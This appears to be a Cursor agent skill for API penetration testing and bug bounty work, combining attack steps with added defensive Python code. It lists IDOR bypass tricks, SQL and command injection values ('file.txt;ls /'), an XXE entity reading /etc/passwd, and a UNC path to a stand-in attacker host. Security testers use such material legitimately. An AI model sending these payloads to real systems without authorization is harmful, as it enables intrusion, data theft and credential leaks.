Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
Confirm successful installation by checking the skill directory location:
.cursor/skills/api-fuzzing-for-bug-bounty
Restart Cursor to activate api-fuzzing-for-bug-bounty. Access via /api-fuzzing-for-bug-bounty in your agent's command palette.
Inputs/Prerequisites
Burp Suite or similar proxy tool
API wordlists (SecLists, api_wordlist)
Understanding of REST/GraphQL/SOAP protocols
Python for scripting
Target API endpoints and documentation (if available)
Outputs/Deliverables
Identified API vulnerabilities
IDOR exploitation proofs
Authentication bypass techniques
SQL injection points
Unauthorized data access documentation
API Types Overview
Type     Protocol   Data Format     Structure
SOAP     HTTP       XML             Header + Body
REST     HTTP       JSON/XML/URL    Defined endpoints
GraphQL  HTTP       Custom Query    Single endpoint
Core Workflow
Step 1: API Reconnaissance
Identify API type and enumerate endpoints:
# Check for Swagger/OpenAPI documentation
/swagger.json
/openapi.json
/api-docs
/v1/api-docs
/swagger-ui.html
# Use Kiterunner for API discovery
kr scan https://target.com -w routes-large.kite
# Extract paths from Swagger
python3 json2paths.py swagger.json
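As an added example (not the skill's own json2paths.py), the following script lists every documented operation in a Swagger 2.0 or OpenAPI 3 document and points out the ones that declare no security requirement, which are the first endpoints to review for missing authorization; SAMPLE_SPEC is a constructed specification.

```python
import json
from urllib.parse import urlparse

# Added example, not the skill's own json2paths.py: enumerate documented
# operations from a Swagger 2.0 / OpenAPI 3 document and flag the ones that
# declare no security requirement. SAMPLE_SPEC below is constructed.

HTTP_METHODS = {"get", "put", "post", "delete", "options", "head", "patch", "trace"}

def base_paths(spec: dict) -> list:
    """Swagger 2.0 carries basePath; OpenAPI 3 lists servers with full URLs."""
    if "basePath" in spec:
        return [spec["basePath"].rstrip("/")]
    servers = spec.get("servers") or [{"url": ""}]
    # keep only the path part of each server URL, e.g. https://h/v1 -> /v1
    return [urlparse(s.get("url", "")).path.rstrip("/") for s in servers]

def extract_operations(spec: dict) -> list:
    """Return sorted (METHOD, full_path, is_secured) tuples."""
    global_security = bool(spec.get("security"))
    ops = set()
    for raw_path, item in spec.get("paths", {}).items():
        for method, op in item.items():
            if method.lower() not in HTTP_METHODS:
                continue  # "parameters", "summary", "$ref" are not operations
            # an explicit "security": [] on an operation turns auth off for it
            secured = bool(op["security"]) if "security" in op else global_security
            for base in base_paths(spec):
                ops.add((method.upper(), base + raw_path, secured))
    return sorted(ops)

def unauthenticated_operations(spec: dict) -> list:
    """Operations that inherit or declare no security requirement at all."""
    return [(m, p) for m, p, secured in extract_operations(spec) if not secured]

SAMPLE_SPEC = json.loads("""{
  "openapi": "3.0.0",
  "servers": [{"url": "https://api.example.test/v1"}],
  "security": [{"bearerAuth": []}],
  "paths": {
    "/users/{id}":   {"get": {"summary": "Read user"},
                      "delete": {"summary": "Delete user"}},
    "/admin/export": {"get": {"summary": "Bulk export", "security": []}},
    "/health":       {"parameters": [], "get": {"security": []}}
  }
}""")
```

Run against a real swagger.json by replacing SAMPLE_SPEC with json.load(open(path)); an operation listed by unauthenticated_operations is documented as reachable without credentials and should be confirmed against the server's actual behaviour.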
Step 2: Authentication Testing
# Test different login paths
/api/mobile/login
/api/v3/login
/api/magic_link
/api/admin/login
# Check rate limiting on auth endpoints
# If no rate limit → brute force possible
# Test mobile vs web API separately
# Don't assume same security controls
Step 3: IDOR Testing
Insecure Direct Object Reference is the most common API vulnerability:
# Basic IDOR
GET /api/users/1234 → GET /api/users/1235
# Even if ID is email-based, try numeric
/?user_id=111 instead of /?user_id=<email>
# Test /me/orders vs /user/654321/orders
IDOR Bypass Techniques:
# Wrap ID in array
{"id":111} → {"id":[111]}
# JSON wrap
{"id":111} → {"id":{"id":111}}
# Send ID twice
URL?id=<LEGIT>&id=<VICTIM>
# Wildcard injection
{"user_id":"*"}
# Parameter pollution
/api/get_profile?user_id=<victim>&user_id=<legit>
{"user_id":<legit_id>,"user_id":<victim_id>}
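Each bypass above works because a server unwraps arrays, takes the last duplicate key, or treats "*" as a match before checking ownership. As an added example (not the skill's code), this is a strict server-side parser for the user_id parameter that rejects every one of those shapes and only then compares the id against the session; authorize_profile_access and all inputs are constructed for illustration.

```python
import json
from urllib.parse import parse_qsl

# Added example, not the skill's code: strict parsing of user_id that rejects
# the IDOR bypass shapes above (array wrap, object wrap, duplicate parameter,
# wildcard) before an ownership check is made. All inputs are constructed.

class RejectedInput(ValueError):
    pass

def _no_duplicate_keys(pairs):
    # json.loads keeps the LAST duplicate key by default; reject instead.
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise RejectedInput(f"duplicate key {key!r}")
        obj[key] = value
    return obj

def _to_scalar_id(value):
    # Only a bare integer or digit string is an id; arrays, nested objects,
    # wildcards and anything else are rejected rather than "unwrapped".
    if isinstance(value, bool) or not isinstance(value, (int, str)):
        raise RejectedInput(f"id must be a scalar, got {type(value).__name__}")
    if isinstance(value, str) and not value.isdigit():
        raise RejectedInput(f"id must be numeric, got {value!r}")
    return int(value)

def parse_user_id(query_string: str = "", json_body: str = "") -> int:
    """Return the single user_id carried by the request, or raise."""
    ids = []
    for key, value in parse_qsl(query_string, keep_blank_values=True):
        if key == "user_id":
            ids.append(_to_scalar_id(value))
    if json_body:
        body = json.loads(json_body, object_pairs_hook=_no_duplicate_keys)
        if "user_id" in body:
            ids.append(_to_scalar_id(body["user_id"]))
    if len(ids) != 1:  # zero ids or a polluted/duplicated parameter
        raise RejectedInput(f"expected exactly one user_id, got {len(ids)}")
    return ids[0]

def authorize_profile_access(session_user: int, query_string="", json_body="") -> bool:
    """Ownership check: the caller may only read their own profile."""
    try:
        requested = parse_user_id(query_string, json_body)
    except (RejectedInput, json.JSONDecodeError):
        return False
    return requested == session_user
```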
Step 4: Injection Testing
SQL Injection in JSON:
{"id":"56456"} → OK
{"id":"56456 AND 1=1#"} → OK
{"id":"56456 AND 1=2#"} → OK
{"id":"56456 AND 1=3#"} → ERROR (vulnerable!)
{"id":"56456 AND sleep(15)#"} → SLEEP 15 SEC
Command Injection:
# Ruby on Rails
?url=Kernel#open → ?url=|ls
# Linux command injection
api.url.com/endpoint?name=file.txt;ls%20/
XXE Injection:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
Path Traversal:
# If .NET app uses Path.Combine(path_1, path_2)
# Test for path traversal
https://example.org/download?filename=a.png
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
https://example.org/download?filename=\\smb.dns.attacker.com\a.png
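The injection probes in this step leave a recognisable trace in request bodies. As an added example (not from the skill), the following detection logic a defender can run over API access logs parses each JSON body, walks nested values, and flags string fields that carry the SQL boolean/time-based or shell-metacharacter shapes shown above; the log line format and LOG_LINES are constructed samples.

```python
import json
import re

# Added example, not from the skill: flag request bodies carrying the SQL
# boolean/time-based probes and shell metacharacters shown in this step.
# Log format and LOG_LINES are constructed samples.

SQLI = re.compile(r"(?i)\b(and|or)\b\s+\d+\s*=\s*\d+|\bsleep\s*\(")
CMDI = re.compile(r"[;|`]|\$\(")

def walk(value, path=""):
    # Yield (dotted_path, scalar) for every leaf of a parsed JSON value
    if isinstance(value, dict):
        for k, v in value.items():
            yield from walk(v, f"{path}.{k}" if path else k)
    elif isinstance(value, list):
        for i, v in enumerate(value):
            yield from walk(v, f"{path}[{i}]")
    else:
        yield path, value

def classify_body(body: str) -> list:
    """Return (field, category) for each suspicious string in a JSON body."""
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        return [("<body>", "malformed-json")]
    hits = []
    for field, value in walk(parsed):
        if not isinstance(value, str) or value.isdigit():
            continue  # plain numeric ids are the expected, benign case
        if SQLI.search(value):
            hits.append((field, "sqli"))
        elif CMDI.search(value):
            hits.append((field, "cmdi"))
    return hits

def scan_logs(lines) -> list:
    # (request_prefix, hits) for every line whose JSON body triggers a rule
    split = [line.partition(" body=") for line in lines]
    return [(p, classify_body(b)) for p, _, b in split if classify_body(b)]

LOG_LINES = [  # constructed sample access-log lines
    'POST /api/v1/item 200 body={"id":"56456"}',
    'POST /api/v1/item 200 body={"id":"56456 AND 1=2#"}',
    'POST /api/v1/item 500 body={"id":"56456 AND 1=3#"}',
    'POST /api/v1/item 200 body={"id":"56456 AND sleep(15)#"}',
    'POST /api/v1/file 200 body={"name":"file.txt;ls /"}',
]
```

A 500 response paired with a flagged body (the third line) is the server-side counterpart of the "ERROR (vulnerable!)" observation above and deserves priority triage.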
Step 5: Method Testing
# Test all HTTP methods
GET /api/v1/users/1
POST /api/v1/users/1
PUT /api/v1/users/1
DELETE /api/v1/users/1
PATCH /api/v1/users/1
# Switch content type
Content-Type: application/json → application/xml